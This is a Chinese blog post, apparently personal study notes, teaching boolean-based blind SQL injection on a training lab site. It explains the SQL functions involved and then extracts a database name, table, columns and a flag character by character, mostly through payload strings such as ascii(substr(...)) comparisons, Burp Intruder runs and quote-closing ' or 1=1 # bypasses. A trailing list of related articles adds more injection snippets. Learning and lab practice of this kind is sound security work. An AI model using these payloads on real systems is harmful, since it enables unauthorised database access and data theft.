SQL注入之布尔盲注

最新推荐文章于 2024-01-03 21:12:35 发布
最新推荐文章于 2024-01-03 21:12:35 发布
阅读量524 收藏
点赞数 1
分类专栏: 学习笔记 文章标签: 网络安全 sql 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46140380/article/details/119785240
版权

注入全方位利用-盲注

一、盲注介绍

  • 注入攻击的本质,是把用户输入的数据当做代码执行。
    • 这里有两个关键条件
      • 第一个是用户能够控制输入 1个字符
      • 第二个是原本程序要执行的代码,拼接了用户输入的数据

所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击。
服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。
请添加图片描述

  • union select 联合查询注入
  • updatexml 报错注入
  • 布尔盲注:因为他不需要猜字段,不需要union 只需要and or
  • 延时盲注: sleep()

二、盲注需要掌握的几个函数

  • length() 函数 返回字符串的长度
  • substr() 截取字符串 (语法:SUBSTR(str,pos,len);)
  • ascii() 返回字符的ascii码 [将字符变为数字]
  • sleep() 将程序挂起一段时间n为n秒
  • if(expr1,expr2,expr3) 判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
函数使用:

length()函数 返回字符串的长度
请添加图片描述
substr() 截取字符串 (语法substr(字符串内容,从哪里开始切割,切割长度))
请添加图片描述
ascii() 返回字符的ascii码 十进制数字
请添加图片描述
sleep() 将程序挂起一段时间n为n秒
请添加图片描述
if(expr1,expr2,expr3) 判断语句 如果第一个语句正确,就执行第二个语句,如果错误执行第三个语句
请添加图片描述

三、盲注靶场的做法

掌控安全靶场地址:
http://inject2b.lab.aqlab.cn:81/Pass-10/index.php?id=1

1.判断注入点

既然我们知道了布尔盲注只会返回对或错2种结果,
and 1=1 页面正常,and 1=2 没有信息
?id=1 and 1=1 页面显示有数据
在这里插入图片描述?id=1 and 1=2 页面显示没数据 布尔型盲注会根据页面是否成功执行返回结果
在这里插入图片描述

2.猜解当前数据库名称长度:

2.1因为得到的信息有限,所以可以使用的函数也有限。
像之前使用database()函数直接得到数据库名,
在这里就只能得到对或者错的信息,就不能得到准确的信息了
2.2 因为盲注不能直接用database()函数得到数据库名,而是先要判断数据库名的长度是多少

and length(database())>11 回显正常
and length(database())>12 回显错误,那就表明,数据库名是等于12个字符。

在这里插入图片描述在这里插入图片描述确定了数据库名有多少个字符组成,那么现在就来猜这些字符。
由于猜的数据必须是对的,才会回显正常。但是把数据库名字的字符一起猜显然是非常困难的,
那我们就换一种方式。一个字符一个字符的才猜,
用我们之前介绍的截断函数(substr)来一个字符一个字符的来猜。

还是先做个小列子。
可以看到有一个叫 stu 的数据库,进入stu数据库

请添加图片描述
我们用截断函数来猜他的名字
前面的 1 表示截取开始的位置,后面的 1 表示截取的长度。
回显为 1 说明我们猜对了。
请添加图片描述
同理,我们也可以用这种方法来实战一下
and substr(database(),1,1)=‘k’
回显正确,说明我们的数据库名的第一个字符,猜对了。
在这里插入图片描述以此类推。我们把这12个字符全部猜完,

就知道完整的数据库名了。

最后得到数据库名 kanwolongxia

and database()=‘kanwolongxia’
在这里插入图片描述这种方法看起来很简单,一个字符一个字符的去猜,但还是很费劲。

为了方便,我们就要用到上面5种函数当中的,ASCII码函数。
可以看到每个字符都有对应的ASCII码
将字符转为ASCII码,然后进行ASCII码猜测

请添加图片描述
从上图中我们可以看到 k 对应的ASCII码是 107

and ascii(substr(database(),1,1))>106 回显正常
and ascii(substr(database(),1,1))>107 回显失败说明这里的ASCII码是等于107,那么对应的字符就是 k

在这里插入图片描述在这里插入图片描述然后再试着猜第二个字符。(只需要把起始位置改一下就行,这里改成了第2个位置)
and ascii(substr(database(),2,1))>96 回显正常
and ascii(substr(database(),2,1))>97 回显失败说明这里的ASCII码是等于97,那么对应的字符就是 a
以此类推。我们把这12个字符全部猜完

Burp跑盲注
1.先写好注入语句

然后抓包,放入爆破模块。清除替换位置,然后重新选择替换位置,很显然,我们是要替换我们注入数据的数据
and ascii(substr((database()),1,1))=107

在这里插入图片描述

2.抓包

在这里插入图片描述

3.跑包

在这里插入图片描述因为我们要替换的是数字,那么palyloads就选number
在这里插入图片描述
查看所有数据包的长度。找到唯一不同的一条数据包,然后查看到数字是107,对应ASCII码是 k
在这里插入图片描述
以此类推,我们只需要把字符的位置换了就可以爆破出所有数据库名的字符了

4.进阶

既然我们已经会使用工具来注入了,但是要手动替换字符的位置,还是有点麻烦,
既然如此,那我们就2个地方一起替换,然后爆破。

1.获取数据库名

and ascii(substr((database()),1,1))=107(这里我知道数据是多少 开始猜字段的时候用>1看是否能获取数据,如果正常的话在使用=1跑数据)

选择最后一个
在这里插入图片描述
第一个爆破是数据库字符的位置,第二个爆破点是字符的ASCII码的值

and ascii(substr((database()),1,1))=107
在这里插入图片描述设置每个爆破点的参数。
在这里插入图片描述在这里插入图片描述查看到第一个字符位置的字符值是107,对应的ASCII码就是 k
在这里插入图片描述第一个字符我们看了,再把剩下的11个看完。然后拼接起来

最后得到数据库名 kanwolongxia

2.获取表名

同理,跑表名的字符值也是一样,只需要把注入语句换一下。

2.1先获取表长度(一个数据库有多张表,所以我们加limit 0,1取第一个表)

and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>1

and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6

回显失败说明这里的长度是等于6 ,表名的字符有6个

在这里插入图片描述爆破表名每个字符位置的字符值
and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>1

在这里插入图片描述设置每个爆破点的参数。

在这里插入图片描述在这里插入图片描述
查看到长度不一样,看下数据包,果然显示正常。
我们看到第3个字符的ASCII码数字是102,对应ASCII码字符是 f

在这里插入图片描述
第3个字符我们看了,再把剩下的5个看完。然后拼接起来

最后获取的表名为IofIag

3.获取字段名

同理,跑字段名的字符值也是一样,只需要把注入语句换一下。

这里我们用了limit函数,所以一次只能输出一个字段名,但是我们不知 道到底有几个字段名,就要自己去试(修改limit的坐标位置)

3.1.猜字段长度

and length((select column_name from information_schema.columns where table_schema=database() and table_name='loflag' limit 0,1))>1	回显正常
and length((select column_name from information_schema.columns where table_schema=database() and table_name='loflag' limit 0,1))>2	回显失败,说明这里的长度是等于2 字段名的字符有2

在这里插入图片描述

3.2.爆破字段名每个字符位置的字符值

and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='loflag' limit 0,1),1,1))=73(这里我知道数据是多少 开始猜字段的时候用>1看是否能获取数据,如果正常的话在使用=1跑数据)

在这里插入图片描述
设置每个爆破点的参数。

在这里插入图片描述
在这里插入图片描述查看到长度不一样,看下数据包,果然显示正常。
我们看到第1个字符的ASCII码是73,对应字符是大写的 I
在这里插入图片描述
第1个字符我们看了,再把剩下的1个看完。然后拼接起来
最后得到字段名 Id
第二个字段为flaglo

5.获取flag字段值

同理,跑字段名的字符值也是一样,只需要把注入语句换一下。
先确定字段名内容的字符有几个

获取长度:

and length((select flaglo from loflag limit 0,1))>1 回显正常

and length((select flaglo from loflag limit 0,1))>8 回显错误,说明该字段的长度等于8
在这里插入图片描述
获取字段值

and ascii(substr((select flaglo from loflag limit 0,1),1,1))>1

设置两个爆破点
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
查看到长度不一样,看下数据包,果然显示正常。
在这里插入图片描述

获取第一个flag:zKaQ-QQQ

第二关:

@$sql = 'select *from news where id="'.$id.'"';

这里只是加了过滤,我要我们把前面的单引号闭合就可以了。再把后面的注释掉就是了。
" and 1=1 --+ qwe

后面的跟上面是一个思路的。

第三关:

$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';

这里只是加了过滤,我要我们把前面的单引号闭合就可以了。再把后面的注释掉就是了。
’ or 1=1 #
后面的跟上面是一个思路的。
在这里插入图片描述

Mr.Huang__
关注
专栏目录
网络安全自学教程》- SQL注入布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 4825
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
mysql 布尔盲注,SQL注入布尔型注入(MySQL)
weixin_34138192的博客
03-17 352
0x00 特点当页面存在注入,但是没有显示位,且没有用echo "mysql_error()"输出错误信息时可以用,它一次只能猜测一个字节,速度慢,但是只要存在注入就能用0x01 利用方式用and连接前后语句:www.xxx.com/aa.php?id=1 and (注入语句) --+根据返回页面是否相同来得到数据0x02 注入步骤找到注入点,判断闭合字符尝试猜解列数,得到显示位得到数据库名最终得...
sql注入-延时注入
课嗨教育的专栏
04-28 1521
渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客 延时注入和布尔盲注差不多 为什么要延时 因为有的时候我们知道这个地方存在注入但是页面返回信息一样 加了个if延时条件判断 if(条件,是,否) http://localhost/Less-9/index.php?id=1%27%20and%20if( 1<2,sleep(10),1)--%201 返回14秒 http://localhost/Less-9/index.php?id=1%27%20and%20if( 1>2,sleep(
SQL注入(二)
qq_48947141的博客
09-23 697
一、按数据库类型 1、Oracle注入 1.1.Oracle基础知识 Oracle是目前最流行的C/S或B/S体系结构的数据库之一。 数据字典:数据字典是元数据的集合,从逻辑上和物理上描述了数据库及其内容,存储于SYSTEM与SYSAUX表空间内的若干段中。 数据字典视图:数据字典中的数据比较复杂,一般查询的是数据字典视图。 数据字典视图三种不同权限的分类:分别以user,all,dba的前缀开头。 常用的数据字典视图 表名 列名 user_tables:存储用户拥有表的信息
面试准备知识
weixin_46396711的博客
02-16 1003
信息收集 假如给你一个网站你怎么去渗透 步骤 首先看是什么类型的网站,大型网站可以去天眼查等查询法人股份等信息,小型网站可以查询使用了哪类建站系统。 whois信息查询 获取注册者邮箱姓名电话等 查询服务器旁站及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。 查看服务器操作系统版本、web中间件,看是否存在已知的漏洞,比如IIS、APACHE、NGINX的解析漏洞 查看IP,进行IP地址端口扫描,对响应的端口进行漏洞探测,比如rsync、心脏滴血、mysql、ft
sql注入布尔盲注
笔墨稠思
11-13 173
什么是盲注? 所谓盲注,就是在服务器没有错误回显的时候完成注入攻击 什么是布尔盲注? 布尔,这个词很明显,他会根据我们输入的注入信息,返回True和False,没有其他的任何报错信息 实现布尔盲注需要利用一下几个函数 length() 返回字符串长度 substr() 截取字符串 ascii() 返回字符的ascii码 靶场实战: 我们发现这个靶场为get传参,参数为id = 1 首先我们判断是否存在注入 我们把传参改为id = 2 - 1 发现数据返
sql注入布尔盲注、延时盲注以及原理
maluxiao123的博客
03-30 1254
之前已经简单介绍了sql注入的基本原理,接下来会按照sql注入的各种类型一一进行梳理,sql注入的常见主要分为回显注入、报错注入、bool盲注、延时注入、堆叠注入、二次注入、宽字节注入、http头注入、DNS LOAD注入。 1.布尔盲注 我们知道页面有回显可以确定回显位时可以进行回显注入,而没有回显的话,有sql报错页面可以使用报错注入,而一般设计完善的网站是会将sql报错的内容给屏蔽掉的。但是我们能判断页面是报错了,就算页面没有报错内容我们同样是有办法的,这时候我们可以使用盲注的方式来进行注入。 比如
sql注入-布尔盲注脚本
m0_58853680的博客
01-03 430
获取cms_users表中的username和password字段的值,并用冒号分隔(使用。USER_AGENT:模拟浏览器请求时使用的User-Agent头信息。实时打印已获取的部分数据库名,并在获取完整个名字后显示最终结果。若成功获取到长度不为None,则调用get_database_获取名为cms_users表的所有列名(同样使用group_接收一个参数content_length表示数据库名的长度。该函数利用SQL注入漏洞尝试获取数据库名或表名的长度。获取当前数据库中的所有表名(使用group_
SQL注入技术
qq_25981849的博客
02-14 427
SQL注入技术 漏洞成因 SQL注入漏洞的原因是由于程序员没有严格过滤用户输入,导致用户输入语句与数据库语句拼接成了一个新的合法语句所产生的漏洞。 SQL注入应用技术 SQL注入可以用来读取文件、写入文件、执行系统命令。 SQL注入的不同类型和常用函数 有回显的注入 有回显的漏洞直接走一遍标准流程就行了 报错注入 有的时候页面会显示sql报错,在这种情况下,我们可以通过人为的报错将不可见的信息转换在错误信息显示出来。 updatexml报错注入 uname=Dumb&passwd=0' or upd
0x01.渗透思路篇
weixin_43263566的博客
05-10 973
0x01.渗透思路篇
MySQL盲注
leshi182的博客
02-22 515
一、基于时间延时的盲注SLEEP 函数 SLEEP( 数字) 函数使用说明:延迟函数,为真时会延时执行代码,为假则不会执行延时。(数字为整数,例:1就是延迟一秒执行。) 例如: Select * from 表名 where id=1 and sleep(2); 1 有这个id=1的内容延迟2秒执行,没有则相反。 二、配合if条件触发 IF(expr1, expr2, expr3) 如果IF(1>2, 真, 假)是true,那它的返回值就是真,如果执行条件是false,执行的条件就是假,具体情况视其
sql注入-延时注入】sleep()、benchmark()函数 延时注入
07-10 7774
【延时注入】结合if、case when 延时注入
sql注入基于布尔/时间的盲注详解
Sp4rkW的博客
10-07 9499
本来想自己总结写一篇的,发现有篇写的很好,转载mark一个~ 原文链接:http://www.jb51.net/article/93445.htm 基于布尔盲注 Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。 由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量...
Sql注入总结
weixin_40709439的博客
05-12 2047
Sql注入总结 联合查询: 1、利用闭合变量报错测试注入点, ?id=1’ .这样说明存在单引号闭合注入 2、是否存在注入点,用and语句测试 ?id=1’ and 1=2# ?id=1’ and 1=1# 3、猜测字段 ,?id=1’ order by 3%23 4、找到页面中数据输入点, ?id=-1’ union select 1,2,3%23 5、查数据库,?id=1’ union ...
SQL注入漏洞详解
墨痕诉清风的博客
08-09 9367
" 预先编译好,也就是SQL引擎会预先进行语法分析,产生语法树,生成执行计划,也就是说,后面你输入的参数,无论你输入的是什么,都不会影响该SQL语句的语法结构了,因为语法分析已经完成了,而语法分析主要是分析SQL命令,比如 select、from 、where 、and、 or 、order by 等等。在这里,我们使用了占位符的方式,将该SQL传入prepare函数后,预处理函数就会得到本次查询语句的SQL模板类,并将这个模板类返回,模板可以防止传那些危险变量改变本身查询语句的语义。
布尔盲注练习
weixin_60777183的博客
08-27 266
盲注需要掌握的几个函数: 1.length() 判断字符串的长度 举例:and length(database())>1 2.substr() 截取字符串的函数 格式:substr(str,pos,len) substr(字符串内容,从哪里切,切多长) 可用于:and substr(database(),1,1)=’a’ 来判断数据库的第一位是否为a 3.ascii() 返回字符的asc码 加入ascii码判断,可改为: ?id=1 and ascii(substr(database(),
sql注入布尔盲注流程
最新发布
06-28
SQL注入布尔盲注是一种利用SQL注入技术来检测查询结果是否满足某个条件的攻击方法,它通常在应用程序中用于验证用户输入时使用。以下是SQL注入布尔盲注的基本流程: 1. **识别可注入点**:攻击者首先尝试找出页面上...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值